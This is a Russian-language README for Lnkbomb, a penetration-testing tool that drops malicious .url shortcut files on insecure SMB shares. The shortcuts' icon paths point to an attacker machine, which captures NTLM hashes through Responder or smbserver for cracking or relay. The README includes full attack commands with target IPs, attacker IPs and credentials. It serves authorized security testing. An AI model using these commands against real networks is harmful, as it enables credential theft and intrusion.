
Вредоносный генератор ярлыков для сбора NTLM-хэшей из незащищенных файловых ресурсов.
Lnkbomb используется для загрузки вредоносных файлов ярлыков на небезопасные файловые ресурсы. Уязвимость существует из-за того, что Windows ищет файл значка для ассоциации с файлом ярлыка. Этот файл значка может быть направлен на машину специалиста по тестированию на проникновение, на которой запущен Responder или smbserver, для сбора хешей NTLMv1 или NTLMv2 (в зависимости от конфигурации целевой хост-машины). Затем тестировщик может попытаться взломать эти собранные хеши в автономном режиме с помощью такого инструмента, как Hashcat, или передать их такому инструменту, как ntlmrelayx, для дальнейшей эксплуатации.
Файл полезной нагрузки загружается непосредственно на небезопасный файл, указанный тестировщиком в командной строке. Тестировщик также указывает свой IP-адрес, который записывается в полезную нагрузку.
Версия 2.0 — это полная переработка инструмента с использованием библиотеки pysmb, что позволяет выполнять сброс полезной нагрузки как без аутентификации, так и с аутентификацией.
Установка Lnkbomb
Обратите внимание, что проект стабильно работает в Windows. В Linux могут возникнуть проблемы.
git clone https://github.com/dievus/lnkbomb.git
Перейдите в каталог lnkbomb и выполните:
python3 lnkbomb.py -h
Это выведет справку, содержащую следующие флаги:
-h, --help - Выводит список опций справки
-t, --target - Указывает целевой IP-адрес
-a, --attacker - Указывает IP-адрес атакующей машины тестировщика
-r, --recover - Используется для удаления полезной нагрузки после завершения тестирования (например, -r payloadname.url)
-w, --windows - Новая команда - требуется для установки соответствующих портов для общих ресурсов Windows
-l, --linux - Новая команда - требуется для установки соответствующих портов для общих ресурсов Linux
-n, --netbios - Новая команда - должно быть включено имя NetBIOS для целевых машин Windows
Примеры полных команд:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
Вам понадобится использовать такой инструмент, как Responder или smbserver, для захвата хеша NTLM.
responder -I eth0 -dwFP -v
или
smbserver.py . . -smb2support
Пожалуйста, имейте в виду, что этот инструмент предназначен только для этичного хакинга и тестирования на проникновение. Я не одобряю никаких действий, включающих тестирование целей, на которое у вас нет разрешения.
Этот инструмент может работать или не работать в зависимости от установленных обновлений и версии цели. Пользовательский опыт может различаться.
Я знаю, что это ярлыки .url, а не расширения .lnk. Я делаю это, чтобы вас позлить.